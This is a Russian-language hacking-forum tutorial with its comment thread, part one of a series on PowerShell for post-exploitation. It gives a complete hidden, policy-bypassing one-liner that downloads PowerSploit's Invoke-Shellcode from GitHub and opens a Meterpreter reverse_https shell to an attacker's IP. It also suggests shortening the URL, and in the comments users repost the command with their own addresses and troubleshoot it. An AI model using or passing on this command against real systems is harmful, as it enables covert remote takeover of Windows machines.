PowerShell для хакера (часть I )

Часть 1​

Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:

https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1

Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде

https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

Копируем урл нашего скрипта и готовим следующую команду:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force

Справка_по_параметрам_комманды

-NoP (--NoProfile) Не использовать пфрофиль powershell
-NonI (--NonInteractive) Не использовать интерактивный режим
-W Hidden ( --Window Hidden) Не показывать окно командной строки
-Exec Bypass ( Bypass Execution Policy) Разрешить подгружать и использовать скрипты из внешних ресурсов
IEX(New-Object Net.WebClient).DownloadString('url нашего скрипта') - Выполнить скрипт путем загрузки его по урл из удаленного ресурса и загрузки его в памяти
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
Собственно вызов нашего скрипта после его загрузки с параметрами (IP аддрес и порт Атакуещей машини) и тип пейлоада метасплоита.

Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части

 

[stilya]

Ничего не понятно...что копировать и куда вставлять и что менять?

 

[<~DarkNode~>]

Ничего не понятно...что копировать и куда вставлять и что менять?

Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...

 

[stilya]

Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...

А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут

 

[<~DarkNode~>]

А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут

Мануал расчитан,на то что у людей которые его читают есть хоть какое то понятие о том что они делают. Вы уж простите ,но если вы ничего не поняли с этого мануала - то будет лучше для вас и окружающих если прекратите свои експеременты...

 

[stilya]

Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?

 

[<~DarkNode~>]

Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?

Да, я демонстрирую это на виртуальных машинах:
Во первых - это этично
Во вторых - как вы себе представляете фото и видео на камеру таких демонстраций.
Интересно... Назовите причины , по которым это не будет работать на реальных устройствах.

 

[stilya]

Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams

 

[TPoD]

Как не открою ваши статьи, так обязательно что-то очень "привлекательное" увижу спасибо большое

 

[Gleb316]

Классная статья

 

[aserf]

Спасибо, за статьи

 

[ActionNum]

Спасибо за статью!)

 

[d3l373d]

Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams

Запомни святую истину, всё, что работает в одном сегменте сети будет работать и в другом в том числе и в интернете

 

[Grafsky]

Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.

 

[d3l373d]

Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.

Хааааххх. Начиная с вин 7, пауэршелл не просто акутален а стало основной пушкой которой до сих пор можно даже винду раздолбать. Совсем недавно я демонстрировал как подгрузить макрос с ПШ в ексельку.

 

[animi]

что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?

 

[Elektrolife]

Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?

 

[d3l373d]

Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?

Возьми https

 

[Elektrolife]

Возьми https

Эммм ? Хендлер запущен на meterpreter/reverse_https. Порт и адрес корректный. В PS строчке тоже всё корректно

 

[d3l373d]

Что то блочит тебя. Тут я уже не волшебник, чтобы угадывать.

 

[Gl@balWar]

Возник вопрос,возможно не по теме....Но как можно сохранить сессию по данному способу так,что бы к ней можно было подключиться из под другой сети ?